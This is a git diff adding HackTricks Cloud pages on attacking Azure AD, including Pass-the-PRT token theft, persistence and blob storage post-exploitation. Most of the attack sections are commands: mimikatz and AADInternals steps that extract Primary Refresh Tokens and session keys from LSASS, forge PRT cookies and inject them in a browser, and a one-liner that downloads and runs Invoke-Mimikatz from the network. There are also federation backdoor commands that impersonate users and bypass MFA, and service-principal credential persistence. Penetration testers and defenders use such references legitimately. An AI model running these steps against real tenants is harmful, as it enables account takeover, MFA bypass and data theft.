+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## What is a PRT + +{% content-ref url="az-primary-refresh-token-prt.md" %} +[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) +{% endcontent-ref %} + +### Check if you have a PRT + +``` +Dsregcmd.exe /status +``` + +In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**. + +
+ +In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`): + +
+ +## PRT Cookie + +The PRT cookie is actually called **`x-ms-RefreshTokenCredential`** and it's a JSON Web Token (JWT). A JWT contains **3 parts**, the **header**, **payload** and **signature**, divided by a `.` and all url-safe base64 encoded. A typical PRT cookie contains the following header and body: + +```json +{ + "alg": "HS256", + "ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383" +} +{ + "refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA", + "is_primary": "true", + "request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA" +} +``` + +The actual **Primary Refresh Token (PRT)** is encapsulated within the **`refresh_token`**, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field **`is_primary`** signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the `request_nonce` is transmitted from the `logon.microsoftonline.com` page. + +### PRT Cookie flow using TPM + +The **LSASS** process will send to the TPM the **KDF context**, and the TPM will used **session key** (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to **derivate** a **key,** and this **derived key** is used to **sign the PRT cookie (JWT).** + +The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed with a **context** (random bytes). + +Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**. + +
+ +## PRT Abuse Scenarios + +As a **regular user** it's possible to **request PRT usage** by asking LSASS for SSO data.\ +This can be done like **native apps** which request tokens from **Web Account Manager** (token broker). WAM pasess the request to **LSASS**, which asks for tokens using signed PRT assertion. Or it can be down with **browser based (web) flow**s where a **PRT cookie** is used as **header** to authenticate requests to Azure AS login pages. + +As **SYSTEM** you could **steal the PRT if not protected** by TPM or **interact with PRT keys in LSASS** using crypto APIs. + +## Pass-the-PRT Attack Examples + +### Attack - ROADtoken + +For more info about this way [**check this post**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**. + +To generate a valid PRT cookie the first thing you need is a nonce.\ +You can get this with: + +```powershell +$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed" +$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token" + +$Params = @{ + "URI" = $URL + "Method" = "POST" +} +$Body = @{ +"grant_type" = "srv_challenge" +} +$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body +$Result.Nonce +AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA +``` + +Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools): + +```powershell +roadrecon auth prt-init +``` + +Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack): + +```powershell +.\ROADtoken.exe +``` + +As oneliner: + +{% code overflow="wrap" %} +```powershell +Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c 
C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"} +``` +{% endcode %} + +Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph: + +```powershell +# Generate +roadrecon auth --prt-cookie + +# Connect +Connect-AzureAD --AadAccessToken --AccountId +``` + +### Attack - Using roadrecon + +### Attack - Using AADInternals and a leaked PRT + +`Get-AADIntUserPRTToken` **gets user’s PRT token** from the Azure AD joined or Hybrid joined computer. Uses `BrowserCore.exe` to get the PRT token. + +```powershell +# Get the PRToken +$prtToken = Get-AADIntUserPRTToken + +# Get an access token for AAD Graph API and save to cache +Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken +``` + +Or if you have the values from Mimikatz you can also use AADInternals to generate a token: + +```powershell +# Mimikat "PRT" value +$MimikatzPRT="MC5BWU..." + +# Add padding +while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="} + +# Decode +$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT)) + +# Mimikatz "Clear key" value +$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0" + +# Convert to Byte array and B64 encode +$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne '')) + +# Generate PRTToken with Nonce +$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce +$prtToken +## You can already use this token ac cookie in the browser + +# Get access token from prtToken +$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken + +# Verify access and connect with Az. 
You can see account id in mimikatz prt output +Connect-AzAccount -AccessToken $AT -TenantID -AccountId +``` + +Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. + +``` +Name: x-ms-RefreshTokenCredential +Value: [Paste your output from above] +Path: / +HttpOnly: Set to True (checked) +``` + +Then go to [https://portal.azure.com](https://portal.azure.com) + +{% hint style="danger" %} +The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. +{% endhint %} + +### Attack - Mimikatz + +#### Steps + +1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use. +2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md). +3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/). 
+ +{% hint style="danger" %} +Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\ +However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).** +{% endhint %} + +You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/) + +{% hint style="warning" %} +This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his. +{% endhint %} + +You can use **mimikatz** to extract the PRT: + +```powershell +mimikatz.exe +Privilege::debug +Sekurlsa::cloudap + +# Or in powershell +iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") +Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' +``` + +(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview) + +
+ +**Copy** the part labeled **Prt** and save it.\ +Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it. + +
+ +{% hint style="info" %} +If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10. +{% endhint %} + +To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so: + +``` +token::elevate +dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect +``` + +
+ +#### Option 1 - Full Mimikatz + +* Now you want to copy both the Context value: + +
+ +* And the derived key value: + +
+ +* Finally you can use all this info to **generate PRT cookies**: + +```bash +Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT] +``` + +
+ +* Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. + +``` +Name: x-ms-RefreshTokenCredential +Value: [Paste your output from above] +Path: / +HttpOnly: Set to True (checked) +``` + +* Then go to [https://portal.azure.com](https://portal.azure.com) + +{% hint style="danger" %} +The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. +{% endhint %} + +#### Option 2 - roadrecon using PRT + +* Renew the PRT first, which will save it in `roadtx.prt`: + +{% code overflow="wrap" %} +```bash +roadtx prt -a renew --prt --prt-sessionkey +``` +{% endcode %} + +* Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim. + +```bash +roadtx browserprtauth +roadtx describe < .roadtools_auth +``` + +
+ +#### Option 3 - roadrecon using derived keys + +Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with: + +{% code overflow="wrap" %} +```bash +roadrecon auth --prt-cookie --prt-context --derives-key +``` +{% endcode %} + +## References + +* [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/) +* [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) +* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md new file mode 100644 index 0000000000..d8149527ad --- /dev/null +++ b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md @@ -0,0 +1,33 @@ +# Az - Permissions for a Pentest + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/README.md b/pentesting-cloud/azure-security/az-persistence/README.md new file mode 100644 index 0000000000..3e463b6811 --- /dev/null +++ b/pentesting-cloud/azure-security/az-persistence/README.md @@ -0,0 +1,98 @@ +# Az - Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Illicit Consent Grant + +By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success. + +Moreover, you could also accept that application with your user as a way to maintain access over it. + +### Applications and Service Principals + +With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application. + +It's possible to **target an application with high permissions** or **add a new application** with high permissions. + +An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators. + +This technique also allows to **bypass MFA**. + +{% code overflow="wrap" %} +```powershell +$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force +$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd) +Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a +``` +{% endcode %} + +* For certificate based authentication + +{% code overflow="wrap" %} +```powershell +Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint -ApplicationId +``` +{% endcode %} + +### Federation - Token Signing Certificate + +With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know. 
+ +**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service: + +```powershell +New-AADIntADFSSelfSignedCertificates +``` + +Then, update the certificate information with Azure AD: + +```powershell +Update-AADIntADFSFederationSettings -Domain cyberranges.io +``` + +### Federation - Trusted Domain + +With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer: + +```powershell +# Using AADInternals +ConvertTo-AADIntBackdoor -DomainName cyberranges.io + +# Get ImmutableID of the user that we want to impersonate. Using Msol module +Get-MsolUser | select userPrincipalName,ImmutableID + +# Access any cloud app as the user +Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true +``` + +## References + +* [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md new file mode 100644 index 0000000000..e7c185893f --- /dev/null +++ b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md @@ -0,0 +1,59 @@ +# Az - Queue Storage Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Queue + +For more information check: + +{% content-ref url="../az-services/az-queue-enum.md" %} +[az-queue-enum.md](../az-services/az-queue-enum.md) +{% endcontent-ref %} + +### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` + +This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. + +{% code overflow="wrap" %} +```bash +az storage queue create --name --account-name + +az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name + +az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name +``` +{% endcode %} + +## References + +* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md new file mode 100644 index 0000000000..196d5ebf43 --- /dev/null +++ b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md @@ -0,0 +1,72 @@ +# Az - Storage Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Storage Privesc + +For more information about storage check: + +{% content-ref url="../az-services/az-storage.md" %} +[az-storage.md](../az-services/az-storage.md) +{% endcontent-ref %} + +### Common tricks + +* Keep the access keys +* Generate SAS + * User delegated are 7 days max + +### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write + +These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. + +{% code overflow="wrap" %} +```bash +az storage account blob-service-properties update \ + --account-name \ + --enable-container-delete-retention true \ + --container-delete-retention-days 100 +``` +{% endcode %} + +### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action + +These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. + +{% code overflow="wrap" %} +```bash +az storage blob service-properties delete-policy update \ + --account-name \ + --enable true \ + --days-retained 100 +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md new file mode 100644 index 0000000000..5f67c2b12e --- /dev/null +++ b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md @@ -0,0 +1,51 @@ +# Az - VMs Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VMs persistence + +For more information about VMs check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### Backdoor VM applications, VM Extensions & Images + +An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +* Using a traditional **rootkit** for example +* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) +* Backdooring the **User Data** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/README.md b/pentesting-cloud/azure-security/az-post-exploitation/README.md new file mode 100644 index 0000000000..cc0b53da54 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -0,0 +1,2 @@ +# Az - Post Exploitation + diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md new file mode 100644 index 0000000000..d63a1375f6 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md @@ -0,0 +1,71 @@ +# Az - Blob Storage Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Storage Privesc + +For more information about storage check: + +{% content-ref url="../az-services/az-storage.md" %} +[az-storage.md](../az-services/az-storage.md) +{% endcontent-ref %} + +### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read + +A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. + +```bash +# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read +az storage blob list \ + --account-name \ + --container-name --auth-mode login + +az storage blob download \ + --account-name \ + --container-name \ + -n file.txt --auth-mode login +``` + +### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write + +A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): + +```bash +# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write +az storage blob upload \ + --account-name \ + --container-name \ + --file /tmp/up.txt --auth-mode login --overwrite +``` + +### \*/delete + +This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
